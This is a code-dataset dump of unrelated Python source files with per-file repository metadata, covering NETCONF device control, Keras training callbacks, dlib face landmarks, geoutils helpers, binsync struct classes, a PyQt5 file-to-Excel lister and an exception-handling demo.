return self.__CONNECT_OK
@decorater_log_in_out
def send_control_signal(self, message_type, send_message):
'''
Transmit device control signal
        Transmits a Netconf message to the device and returns the response signal.
Explanation about parameter:
message_type: Message type(response message)
discard-changes
validate
lock
unlock
get-config
edit-config
confirmed-commit
commit
send_message: Send message
get-config:XML format (<config></config>)
edit-config:XML format (<config></config>)
Not necessary in case of other message types.
Explanation about return value:
Send result : boolean (True:Normal,False:Abnormal)
            Response signal : str (Netconf response signal
(Returns "NetconfSendOK" to return value 1
when rpc-error is received successfully.))
'''
is_judg_result, judg_message_type = self.__judg_control_signal(
message_type)
GlobalModule.EM_LOGGER.debug("__send_signal_judg:%s", is_judg_result)
GlobalModule.EM_LOGGER.debug("judg_message_type:%s", judg_message_type)
if is_judg_result is False:
GlobalModule.EM_LOGGER.debug("__send_signal_judg NG")
return False, None
GlobalModule.EM_LOGGER.debug("__send_signal_judg OK")
try:
if judg_message_type == "get_config":
GlobalModule.EM_LOGGER.debug("judg_message_type:get_config")
GlobalModule.EM_LOGGER.debug(
"send_message: %s", send_message)
receive_message = self.__connection.get_config(
source='running',
filter=('subtree', send_message)).data_xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
elif judg_message_type == "edit_config":
GlobalModule.EM_LOGGER.debug("judg_message_type:edit_config")
GlobalModule.EM_LOGGER.debug(
"send_message: %s", send_message)
receive_message = self.__connection.edit_config(
config=send_message).xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
elif judg_message_type == "confirmed_commit":
GlobalModule.EM_LOGGER.debug(
"judg_message_type:confirmed_commit")
is_send_result, return_value = \
GlobalModule.EM_CONFIG.read_sys_common_conf(
"Timer_confirmed-commit")
GlobalModule.EM_LOGGER.debug("read_sys_common:%s",
is_send_result)
if is_send_result is False:
GlobalModule.EM_LOGGER.debug("read_sys_common NG")
return False, None
GlobalModule.EM_LOGGER.debug("read_sys_common OK")
GlobalModule.EM_LOGGER.debug("return_value:%s", return_value)
return_value = return_value / 1000
receive_message = self.__connection.commit(
confirmed=True, timeout=str(return_value)).xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
else:
GlobalModule.EM_LOGGER.debug("judg_message_type:%s",
judg_message_type)
try:
method = getattr(self.__connection, judg_message_type)
receive_message = method().xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
except AttributeError:
GlobalModule.EM_LOGGER.debug("AttributeError:%s",
judg_message_type)
return False, None
GlobalModule.EM_LOGGER.info("107003 Sending %s to %s",
message_type, self.__device_ip)
except Exception as exception:
GlobalModule.EM_LOGGER.warning(
"207005 protocol %s Sending Error", message_type)
GlobalModule.EM_LOGGER.debug(
"Sending Error:%s", str(type(exception)))
return False, None
GlobalModule.EM_LOGGER.info("107002 Receiving rpc-reply from %s",
self.__device_ip)
return True, receive_message
@decorater_log_in_out
def disconnect_device(self):
'''
Device disconnection control
Disconnect from the device.
Explanation about parameter:
None
Explanation about return value:
Judgment result : boolean (True:Normal,False:Abnormal)
'''
try:
self.__connection.close_session()
except Exception as exception:
GlobalModule.EM_LOGGER.debug(
"Disconnect Error:%s", str(type(exception)))
return False
GlobalModule.EM_LOGGER.info("107004 SSH Connection Closed for %s",
self.__device_ip)
return True
@decorater_log
def __init__(self):
'''
Constructor
'''
self.__connection = None
self.__device_ip = None
self.__capability_list = \
('urn:ietf:params:netconf:base:1.0',
'urn:ietf:params:netconf:base:1.1')
@decorater_log
def __judg_control_signal(self, message_type):
'''
Control signal judgment
Make judgment on the message to be sent based on the message type.
Explanation about parameter:
message_type: Message type (response message)
discard-changes
validate
lock
unlock
get-config
edit-config
confirmed-commit
commit
Explanation about return value:
Judgment result : boolean (True:Normal,False:Abnormal)
Judgment message type : str
'''
message_list = ["discard-changes", "validate", "lock",
"unlock", "get-config", "edit-config",
"confirmed-commit", "commit"]
GlobalModule.EM_LOGGER.debug("message_type:%s", message_type)
if message_type in message_list:
GlobalModule.EM_LOGGER.debug("message_type Match")
judg_message_type = message_type.replace('-', '_')
return True, judg_message_type
GlobalModule.EM_LOGGER.debug("message_type UNMatch")
return False, None
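# Rough usage sketch (illustrative only; the IP address, credentials and "<config/>" filter
# are placeholder values, and the surrounding EM runtime objects such as
# GlobalModule.EM_CONFIG / EM_LOGGER must already be initialized):
#
#     protocol = EmNetconfProtocol()
#     device_json = json.dumps({"device_info": {"mgmt_if_address": "192.0.2.1",
#                                               "username": "admin",
#                                               "password": "secret"}})
#     if protocol.connect_device(device_json) == 1:  # 1 == __CONNECT_OK
#         ok, reply = protocol.send_control_signal("get-config", "<config/>")
#         protocol.disconnect_device()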
| 37.513812
| 80
| 0.546318
| 13,142
| 0.967747
| 0
| 0
| 12,915
| 0.951031
| 0
| 0
| 4,838
| 0.356259
|
b0e21640f79315d5678d2b1eb1562ded16d33050
| 1,935
|
py
|
Python
|
policy/openbot/callbacks.py
|
januxnet/OpenBot
|
04768161a552281e1e14acde98589a64628b86c7
|
[
"MIT"
] | 1,971
|
2020-08-24T22:24:24.000Z
|
2021-07-24T18:43:39.000Z
|
policy/openbot/callbacks.py
|
FlorentGuinier/OpenBot
|
087b1c89fd61ee5e644a0b042c9e5f25540caeae
|
[
"MIT"
] | 145
|
2020-08-26T23:00:28.000Z
|
2021-07-26T22:00:06.000Z
|
policy/openbot/callbacks.py
|
FlorentGuinier/OpenBot
|
087b1c89fd61ee5e644a0b042c9e5f25540caeae
|
[
"MIT"
] | 342
|
2020-08-26T10:39:43.000Z
|
2021-07-26T12:12:10.000Z
|
# Created by Matthias Mueller - Intel Intelligent Systems Lab - 2020
import os
import tensorflow as tf
def checkpoint_cb(checkpoint_path, steps_per_epoch=-1, num_epochs=10):
# Create a callback that saves the model's weights every epochs
checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=os.path.join(checkpoint_path, "cp-{epoch:04d}.ckpt"),
monitor="val_loss",
verbose=0,
save_best_only=False,
save_weights_only=False,
mode="auto",
save_freq="epoch" if steps_per_epoch < 0 else int(num_epochs * steps_per_epoch),
)
return checkpoint_callback
def tensorboard_cb(log_path):
tensorboard_callback = tf.keras.callbacks.TensorBoard(
log_dir=log_path,
histogram_freq=0,
write_graph=True,
write_images=True,
update_freq="epoch",
profile_batch=2,
embeddings_freq=0,
embeddings_metadata=None,
)
return tensorboard_callback
def logger_cb(log_path, append=False):
logger_callback = tf.keras.callbacks.CSVLogger(
os.path.join(log_path, "log.csv"), append=append
)
return logger_callback
def early_stopping_cb():
early_stopping_callback = tf.keras.callbacks.EarlyStopping(
monitor="val_loss",
min_delta=0,
patience=20,
verbose=0,
mode="auto",
baseline=None,
restore_best_weights=False,
)
return early_stopping_callback
def reduce_lr_cb():
reduce_lr_callback = tf.keras.callbacks.ReduceLROnPlateau(
monitor="val_loss", factor=0.3, patience=2, min_lr=0.0001
)
return reduce_lr_callback
def lr_schedule_cb():
return tf.keras.callbacks.LearningRateScheduler(scheduler)
# This function defines a custom learning schedule.
def scheduler(epoch):
if epoch < 10:
return 0.0002
elif epoch < 20:
return 0.0001
else:
return 0.00005
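# Illustrative behavior of the schedule above (note added for clarity, not in the original
# file): epochs 0-9 train at lr=0.0002, epochs 10-19 at lr=0.0001, and epoch 20 onward at
# lr=0.00005.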
| 26.148649
| 88
| 0.67907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 268
| 0.138501
|
b0e2cf5bd2ba70f93247b07879264830fda0661a
| 856
|
py
|
Python
|
generate_landmarks.py
|
PandaWhoCodes/chutya_rating
|
88f73e37c517c1d68ebf518b40cf93667f39991b
|
[
"MIT"
] | null | null | null |
generate_landmarks.py
|
PandaWhoCodes/chutya_rating
|
88f73e37c517c1d68ebf518b40cf93667f39991b
|
[
"MIT"
] | null | null | null |
generate_landmarks.py
|
PandaWhoCodes/chutya_rating
|
88f73e37c517c1d68ebf518b40cf93667f39991b
|
[
"MIT"
] | null | null | null |
import sys
import os
import dlib
import glob
from skimage import io
predictor_path = "data/shape_predictor_68_face_landmarks.dat"
faces_folder_path = "data/pics"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
def sortKeyFunc(s):
return int(os.path.basename(s)[:-4])
my_glob = glob.glob(os.path.join(faces_folder_path, "*.jpg"))
my_glob.sort(key=sortKeyFunc)
print(my_glob)
for f in my_glob:
print("Processing file: {}".format(f))
img = io.imread(f)
dets = detector(img, 1)
for k, d in enumerate(dets):
shape = predictor(img, d)
file_write = ""
for i in range(0, 68):
file_write += str(shape.part(i).x) + ", " + str(shape.part(i).y) + ", "
with open("data/landmarks.txt", "a") as f:
f.write(file_write)
f.write("\n")
| 25.939394
| 83
| 0.647196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 120
| 0.140187
|
b0e46a90af345235275bf125d7191b762e1c076e
| 6,530
|
py
|
Python
|
geoutils/misc.py
|
erikmannerfelt/GeoUtils
|
96a044f7cca73f936e5b245a5e99e0d2102d279f
|
[
"BSD-3-Clause"
] | 23
|
2020-11-11T11:00:45.000Z
|
2022-03-28T07:06:56.000Z
|
geoutils/misc.py
|
erikmannerfelt/GeoUtils
|
96a044f7cca73f936e5b245a5e99e0d2102d279f
|
[
"BSD-3-Clause"
] | 223
|
2020-11-11T14:34:51.000Z
|
2022-03-31T14:14:58.000Z
|
geoutils/misc.py
|
erikmannerfelt/GeoUtils
|
96a044f7cca73f936e5b245a5e99e0d2102d279f
|
[
"BSD-3-Clause"
] | 14
|
2021-02-19T09:57:46.000Z
|
2022-03-21T09:49:12.000Z
|
"""Miscellaneous functions, mainly for testing."""
from __future__ import annotations
import functools
import warnings
import numpy as np
import rasterio as rio
import geoutils
from geoutils._typing import ArrayLike
from geoutils.georaster import Raster, RasterType
def array_equal(
array1: RasterType | ArrayLike,
array2: RasterType | ArrayLike,
equal_nan: bool = True,
tolerance: float = 0.0,
) -> bool:
"""
Check if two arrays or Rasters are equal.
This function mirrors (and partly uses) 'np.array_equal' with these exceptions:
1. Different dtypes are okay as long as they are equal (e.g. '1 == 1.0' is True)
2. Rasters are directly comparable.
3. masked_array masks are respected.
4. A tolerance argument is added.
5. The function works with numpy<=1.18.
:param array1: The first array-like object to compare.
:param array2: The second array-like object to compare.
:param equal_nan: Whether to compare NaNs as equal ('NaN == NaN' is True)
:param tolerance: The maximum allowed summed difference between the arrays.
Examples:
Any object that can be parsed as an array can be compared.
>>> arr1 = [1, 2, 3]
>>> arr2 = np.array([1., 2., 3.])
>>> array_equal(arr1, arr2)
True
Nans are equal by default, but can be disabled with 'equal_nan=False'
>>> arr3 = np.array([1., 2., np.nan])
>>> array_equal(arr1, arr3)
False
>>> array_equal(arr3, arr3.copy())
True
>>> array_equal(arr3, arr3, equal_nan=False)
False
The equality tolerance can be set with the 'tolerance' argument (defaults to 0).
>>> arr4 = np.array([1., 2., 3.1])
>>> array_equal(arr1, arr4)
False
>>> array_equal(arr1, arr4, tolerance=0.2)
True
Masks in masked_arrays are respected.
>>> arr5 = np.ma.masked_array(arr1, [False, False, True])
>>> array_equal(arr1, arr5)
False
>>> array_equal(arr3, arr5)
True
>>> array_equal(arr3, arr5, equal_nan=False)
False
"""
arrays: list[np.ndarray] = []
strings_compared = False # Flag to handle string arrays instead of numeric
# Convert both inputs to numpy ndarrays
for arr in array1, array2:
if any(s in np.dtype(type(np.asanyarray(arr)[0])).name for s in ("<U", "str")):
strings_compared = True
if isinstance(arr, Raster): # If a Raster subclass, take its data. I don't know why mypy complains here!
arr = arr.data # type: ignore
if isinstance(arr, np.ma.masked_array): # If a masked_array, replace the masked values with nans
if "float" not in np.dtype(arr.dtype).name:
arr = arr.astype(float)
arrays.append(arr.filled(np.nan)) # type: ignore
else:
arrays.append(np.asarray(arr))
if np.shape(arrays[0]) != np.shape(arrays[1]):
return False
if strings_compared: # If they are strings, the tolerance/nan handling is irrelevant.
return bool(np.array_equal(arrays[0], arrays[1]))
diff = np.diff(arrays, axis=0)
if "float" in np.dtype(diff.dtype).name and np.any(~np.isfinite(diff)):
# Check that the nan-mask is equal. If it's not, or nans are not allowed at all, return False
if not equal_nan or not np.array_equal(np.isfinite(arrays[0]), np.isfinite(arrays[1])):
return False
return bool(np.nansum(np.abs(diff)) <= tolerance)
def deprecate(removal_version: str | None = None, details: str | None = None): # type: ignore
"""
Trigger a DeprecationWarning for the decorated function.
    :param func: The function to be deprecated (supplied when the decorator is applied).
:param removal_version: Optional. The version at which this will be removed.
If this version is reached, a ValueError is raised.
:param details: Optional. A description for why the function was deprecated.
:triggers DeprecationWarning: For any call to the function.
:raises ValueError: If 'removal_version' was given and the current version is equal or higher.
:returns: The decorator to decorate the function.
"""
def deprecator_func(func): # type: ignore
@functools.wraps(func)
def new_func(*args, **kwargs): # type: ignore
# True if it should warn, False if it should raise an error
should_warn = removal_version is None or removal_version > geoutils.version.version
# Add text depending on the given arguments and 'should_warn'.
text = (
f"Call to deprecated function '{func.__name__}'."
if should_warn
else f"Deprecated function '{func.__name__}' was removed in {removal_version}."
)
# Add the details explanation if it was given, and make sure the sentence is ended.
if details is not None:
details_frm = details.strip()
if details_frm[0].islower():
details_frm = details_frm[0].upper() + details_frm[1:]
text += " " + details_frm
if not any(text.endswith(c) for c in ".!?"):
text += "."
if should_warn and removal_version is not None:
text += f" This functionality will be removed in version {removal_version}."
elif not should_warn:
text += f" Current version: {geoutils.version.version}."
if should_warn:
warnings.warn(text, category=DeprecationWarning, stacklevel=2)
else:
raise ValueError(text)
return func(*args, **kwargs)
return new_func
return deprecator_func
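# Minimal usage sketch (illustrative, not part of the module; the version string and message
# are placeholders):
#
#     @deprecate(removal_version="99.0", details="use new_function instead")
#     def old_function():
#         ...
#
# Calling old_function() emits a DeprecationWarning while geoutils.version.version is below
# "99.0"; once the installed version reaches it, the call raises ValueError instead.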
def resampling_method_from_str(method_str: str) -> rio.warp.Resampling:
"""Get a rasterio resampling method from a string representation, e.g. "cubic_spline"."""
# Try to match the string version of the resampling method with a rio Resampling enum name
for method in rio.warp.Resampling:
if str(method).replace("Resampling.", "") == method_str:
resampling_method = method
break
# If no match was found, raise an error.
else:
raise ValueError(
f"'{method_str}' is not a valid rasterio.warp.Resampling method. "
f"Valid methods: {[str(method).replace('Resampling.', '') for method in rio.warp.Resampling]}"
)
return resampling_method
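# Illustrative call (not part of the module): resampling_method_from_str("cubic_spline")
# returns rio.warp.Resampling.cubic_spline, while an unrecognized name raises ValueError
# listing the valid method names.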
| 38.187135
| 113
| 0.622971
| 0
| 0
| 0
| 0
| 1,453
| 0.222511
| 0
| 0
| 3,665
| 0.561256
|
b0e7cd1cacbdf9713f6574f513c54cc6fc8be57b
| 1,860
|
py
|
Python
|
sorting/merge_sort.py
|
matuzalemmuller/algoritmos
|
138e7c9747879a58fab48908541c175b8653da5c
|
[
"MIT"
] | null | null | null |
sorting/merge_sort.py
|
matuzalemmuller/algoritmos
|
138e7c9747879a58fab48908541c175b8653da5c
|
[
"MIT"
] | null | null | null |
sorting/merge_sort.py
|
matuzalemmuller/algoritmos
|
138e7c9747879a58fab48908541c175b8653da5c
|
[
"MIT"
] | null | null | null |
# UFSC - Campus Trindade
# PPGEAS - Introduction to Algorithms
# Matuzalem Muller dos Santos
# 2019/1
# Commented code is for calculating algorithm complexity and printing variables
from random import randint
import time
import sys
def merge_sort(array):
# n = 0
if len(array) > 1:
half = len(array) // 2
left_array = array[:half]
right_array = array[half:]
# n += merge_sort(left_array)
# n += merge_sort(right_array)
merge_sort(left_array)
merge_sort(right_array)
left_mark, right_mark, position = 0, 0, 0
while left_mark < len(left_array) and right_mark < len(right_array):
if left_array[left_mark] < right_array[right_mark]:
array[position] = left_array[left_mark]
left_mark += 1
else:
array[position] = right_array[right_mark]
right_mark += 1
position += 1
# n += 1
while left_mark < len(left_array):
array[position] = left_array[left_mark]
left_mark += 1
position += 1
# n += 1
while right_mark < len(right_array):
array[position] = right_array[right_mark]
right_mark += 1
position += 1
# n += 1
# return array, n
return array
if __name__ == '__main__':
array = []
random_number = 0
try:
number_of_elements = int(sys.argv[1])
except:
number_of_elements = 10
for i in range(0, number_of_elements):
random_number = randint(1, 9_999_999_999)
array.append(random_number)
# print(array)
start_time = time.time()
# array, n = merge_sort(array)
array = merge_sort(array)
running_time = time.time() - start_time
# print(array)
# print(n)
print(running_time)
| 26.956522
| 79
| 0.58172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 359
| 0.193011
|
b0e7ec352bf4d97e4861749ed21422b37bbf8b42
| 2,239
|
py
|
Python
|
binsync/data/struct.py
|
zachsez/binsync
|
39a53a84c640314adbf50e612177c4a56c43542c
|
[
"MIT"
] | 40
|
2021-05-09T03:24:46.000Z
|
2022-03-31T23:01:50.000Z
|
binsync/data/struct.py
|
zachsez/binsync
|
39a53a84c640314adbf50e612177c4a56c43542c
|
[
"MIT"
] | 53
|
2021-05-27T07:53:58.000Z
|
2022-03-27T21:35:26.000Z
|
binsync/data/struct.py
|
zachsez/binsync
|
39a53a84c640314adbf50e612177c4a56c43542c
|
[
"MIT"
] | 10
|
2021-05-13T22:09:38.000Z
|
2022-03-31T23:51:27.000Z
|
import toml
from typing import List, Dict
from .artifact import Artifact
class StructMember(Artifact):
"""
Describes a struct member that corresponds to a struct.
"""
__slots__ = (
"last_change",
"member_name",
"offset",
"type",
"size",
)
def __init__(self, member_name, offset, type_, size, last_change=None):
super(StructMember, self).__init__(last_change=last_change)
self.member_name: str = member_name
self.offset: int = offset
self.type: str = type_
self.size: int = size
@classmethod
def parse(cls, s):
sm = StructMember(None, None, None, None)
sm.__setstate__(toml.loads(s))
return sm
class Struct(Artifact):
"""
Describes a struct
"""
__slots__ = (
"last_change",
"name",
"size",
"struct_members",
)
def __init__(self, name: str, size: int, struct_members: List[StructMember], last_change=None):
super(Struct, self).__init__(last_change=last_change)
self.name = name
self.size = size
self.struct_members = struct_members
def __getstate__(self):
return {
"metadata": {
"name": self.name, "size": self.size, "last_change": self.last_change
},
"members": {"%x" % member.offset: member.__getstate__() for member in self.struct_members}
}
def __setstate__(self, state):
metadata = state["metadata"]
members = state["members"]
self.name = metadata["name"]
        self.size = metadata["size"]
        self.last_change = metadata.get("last_change", None)
self.struct_members = [
StructMember.parse(toml.dumps(member)) for _, member in members.items()
]
def add_struct_member(self, mname, moff, mtype, size):
self.struct_members.append(StructMember(mname, moff, mtype, size))
@classmethod
def parse(cls, s):
struct = Struct(None, None, None)
struct.__setstate__(s)
return struct
@classmethod
def load(cls, struct_toml):
s = Struct(None, None, None)
s.__setstate__(struct_toml)
return s
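# Minimal usage sketch (illustrative; the struct name, member names, offsets and types below
# are made up):
#
#     s = Struct("my_struct", 8, [])
#     s.add_struct_member("field_a", 0, "int", 4)
#     s.add_struct_member("field_b", 4, "int", 4)
#     state = s.__getstate__()   # members are keyed by their hex offset
#
# Restoring goes through Struct.load()/__setstate__ above, which parse each member back via
# StructMember.parse.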
| 23.568421
| 102
| 0.590442
| 2,151
| 0.960697
| 0
| 0
| 406
| 0.181331
| 0
| 0
| 284
| 0.126842
|
b0e84025ba8edc34831e545492abd9cc1b7a33c6
| 9,070
|
py
|
Python
|
__init__.py
|
itsmepvr/list_images_to_excel
|
a4da3948a289c91cbcab90980364e989af7f1118
|
[
"MIT"
] | null | null | null |
__init__.py
|
itsmepvr/list_images_to_excel
|
a4da3948a289c91cbcab90980364e989af7f1118
|
[
"MIT"
] | null | null | null |
__init__.py
|
itsmepvr/list_images_to_excel
|
a4da3948a289c91cbcab90980364e989af7f1118
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Author: Venkata Ramana P
<github.com/itsmepvr>
List files to an excel sheet
"""
import os, glob
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QMessageBox
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from os.path import expanduser
import xlsxwriter
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(569, 304)
MainWindow.setStyleSheet("background-color:rgba(0,0,0,0.5); font-weight:bold;")
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(10, 40, 391, 26))
self.lineEdit.setStyleSheet("background-color:rgb(255, 255, 255)")
self.lineEdit.setObjectName("lineEdit")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(410, 40, 151, 26))
self.pushButton.setStyleSheet("background-color:rgb(255, 255, 255)")
self.pushButton.setObjectName("pushButton")
self.pushButton.clicked.connect(self.chooseFilesDirectory)
self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_2.setGeometry(QtCore.QRect(10, 80, 391, 26))
self.lineEdit_2.setStyleSheet("background-color:rgb(255, 255, 255)")
self.lineEdit_2.setText("")
self.lineEdit_2.setObjectName("lineEdit_2")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(410, 80, 151, 26))
self.pushButton_2.setStyleSheet("background-color:rgb(255, 255, 255)")
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_2.clicked.connect(self.chooseExcelDirectory)
self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(10, 120, 391, 26))
self.lineEdit_3.setStyleSheet("background-color:rgb(255, 255, 255)")
self.lineEdit_3.setText("files_to_list")
self.lineEdit_3.setObjectName("lineEdit_3")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(410, 117, 141, 31))
self.label.setStyleSheet("color:rgb(255, 255, 255);\n"
"background-color:none;\n"
"font-weight:bold;")
self.label.setObjectName("label")
self.checkBox = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox.setEnabled(True)
self.checkBox.setGeometry(QtCore.QRect(170, 160, 121, 31))
self.checkBox.setTabletTracking(False)
self.checkBox.setAutoFillBackground(False)
self.checkBox.setStyleSheet("color:rgb(230, 75, 238);\n"
"background-color:none;\n"
"font-weight:bold;\n"
"font-size:25px;")
self.checkBox.setChecked(True)
self.checkBox.setObjectName("checkBox")
self.checkBox_2 = QtWidgets.QCheckBox(self.centralwidget)
self.checkBox_2.setGeometry(QtCore.QRect(300, 160, 131, 31))
self.checkBox_2.setStyleSheet("color:rgb(230, 75, 238);\n"
"background-color:none;\n"
"font-weight:bold;\n"
"font-size:25px;")
self.checkBox_2.setObjectName("checkBox_2")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(270, 210, 121, 31))
self.pushButton_3.setStyleSheet("background-color: rgb(138, 226, 52);\n"
"color:black;\n"
"font-weight:bold;")
self.pushButton_3.setObjectName("pushButton_3")
self.pushButton_3.clicked.connect(self.checkFields)
self.pushButton_4 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_4.setGeometry(QtCore.QRect(400, 210, 131, 31))
self.pushButton_4.setStyleSheet("background-color: rgb(239, 41, 41);\n"
"color:black;\n"
"font-weight:bold;")
self.pushButton_4.setObjectName("pushButton_4")
self.pushButton_4.clicked.connect(self.quit)
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(70, 260, 461, 20))
self.label_2.setStyleSheet("color:rgb(252, 175, 62);\n"
"font: italic 11pt \"DejaVu Serif\";\n"
"")
self.label_2.setObjectName("label_2")
self.progressBar = QtWidgets.QProgressBar(self.centralwidget)
self.progressBar.setGeometry(QtCore.QRect(40, 220, 201, 23))
self.progressBar.setStyleSheet("background-color:rgb(243, 243, 243)")
self.progressBar.setProperty("value", 24)
self.progressBar.setObjectName("progressBar")
self.progressBar.hide()
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.filePath = "/home/itsmepvr/.local/share/Anki2/3-4 Years Primary/collection.media"
self.excelPath = "/home/itsmepvr/Downloads"
self.excelName = "files_to_list"
self.ext = []
self.convert()
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "List Files to Excel"))
self.pushButton.setText(_translate("MainWindow", "Select Files Path"))
self.pushButton_2.setText(_translate("MainWindow", "Select Excel Path"))
self.label.setText(_translate("MainWindow", "Excel File Name"))
self.checkBox.setText(_translate("MainWindow", "Images"))
self.checkBox_2.setText(_translate("MainWindow", "Audios"))
self.pushButton_3.setText(_translate("MainWindow", "Convert"))
self.pushButton_4.setText(_translate("MainWindow", "Cancel"))
self.label_2.setText(_translate("MainWindow", "Developed by: Venkata Ramana P <github.com/itsmepvr>"))
def quit(self):
self.close()
def chooseFilesDirectory(self):
self.progressBar.hide()
src_dir = QFileDialog.getExistingDirectory(None, 'Select a folder:', expanduser("~"))
self.lineEdit.setText(src_dir)
def chooseExcelDirectory(self):
self.progressBar.hide()
src_dir = QFileDialog.getExistingDirectory(None, 'Select a folder:', expanduser("~"))
self.lineEdit_2.setText(src_dir)
def checkFields(self):
self.filePath = self.lineEdit.text()
self.excelPath = self.lineEdit_2.text()
self.excelName = self.lineEdit_3.text()
if not os.path.isdir(self.filePath):
QMessageBox.warning(None, "Warning", "Files path does not exists", QtWidgets.QMessageBox.Ok)
return
if not os.path.isdir(self.excelPath):
QMessageBox.warning(None, "Warning", "Excel path does not exists", QtWidgets.QMessageBox.Ok)
return
if self.excelName == '':
QMessageBox.warning(None, "Warning", "Excel file name cannot be empty", QtWidgets.QMessageBox.Ok)
return
if not (self.checkBox.isChecked() or self.checkBox_2.isChecked()):
QMessageBox.warning(None, "Warning", "Select any images/audios", QtWidgets.QMessageBox.Ok)
return
self.ext = []
if self.checkBox.isChecked():
self.ext.append("images")
if self.checkBox_2.isChecked():
self.ext.append("audios")
self.convert()
    def convert(self):
        files = self.getImages(self.filePath)
        excel = os.path.join(self.excelPath, self.excelName + '.xlsx')
        workbook = xlsxwriter.Workbook(excel)
        worksheet = workbook.add_worksheet()
        self.progressBar.setValue(0)
        self.progressBar.show()
        if files:
            # guard against an empty selection (avoids a division by zero)
            incValue = 100 / len(files)
            progressCount = 0
            for row, fl in enumerate(files):
                worksheet.write(row, 0, fl)
                progressCount += incValue
                self.progressBar.setValue(int(progressCount))
        self.progressBar.setValue(100)
        workbook.close()
    def getImages(self, path):
        files = []
        ext = []
        if "images" in self.ext:
            ext = ext + ['png', 'jpg', 'gif']
        if "audios" in self.ext:
            ext = ext + ['mp3', 'wav']
        # keep only files whose extension matches the selected categories
        for file in os.listdir(path):
            if any(file.lower().endswith('.' + e) for e in ext):
                files.append(file)
        files.sort()
        return files
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 43.190476
| 110
| 0.661632
| 8,444
| 0.930981
| 0
| 0
| 0
| 0
| 0
| 0
| 1,847
| 0.203638
|
b0e8a0baacae15b6d64e13be86210039b28af7e3
| 1,215
|
py
|
Python
|
exception.py
|
a2gs/pythonStudy
|
e790e223a05fd50a5bcaf1240ef24ff60f361cdd
|
[
"MIT"
] | null | null | null |
exception.py
|
a2gs/pythonStudy
|
e790e223a05fd50a5bcaf1240ef24ff60f361cdd
|
[
"MIT"
] | null | null | null |
exception.py
|
a2gs/pythonStudy
|
e790e223a05fd50a5bcaf1240ef24ff60f361cdd
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class myBaseException(Exception):
def __init__(self, errNum, errMsg):
self.err = errNum
self.msg = errMsg
class myExcept_1(myBaseException):
def __init__(self):
super().__init__(13, "except 1")
class myExcept_2(myBaseException):
def __init__(self):
super().__init__(8, "except 2")
def func(b):
if(b == 1):
raise myExcept_1
elif(b == 2):
raise myExcept_2
elif(b == 3):
return
try:
func(1)
except myExcept_1 as e:
	print(f'Error number: {e.err} message: {e.msg}')
except myExcept_2 as e:
	print(f'Error number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done1\n----------------------------------------')
try:
func(2)
except myExcept_1 as e:
	print(f'Error number: {e.err} message: {e.msg}')
except myExcept_2 as e:
	print(f'Error number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
print('Done2\n----------------------------------------')
try:
func(3)
except myExcept_1 as e:
	print(f'Error number: {e.err} message: {e.msg}')
except myExcept_2 as e:
	print(f'Error number: {e.err} message: {e.msg}')
else:
print('No exception')
finally:
print('Do this')
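# Expected flow for the third block: func(3) returns normally, so the else branch
# prints 'No exception', and finally still prints 'Do this'.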
| 19.918033
| 56
| 0.626337
| 289
| 0.23786
| 0
| 0
| 0
| 0
| 0
| 0
| 472
| 0.388477
|
b0e8e97e17556ae476f654f72b30433601cb2273
| 564
|
py
|
Python
|
datachecker/processors/conditionals.py
|
jayclassless/datachecker
|
dd42b95f87eaaca428595fe5da639f9a710afba8
|
[
"MIT"
] | null | null | null |
datachecker/processors/conditionals.py
|
jayclassless/datachecker
|
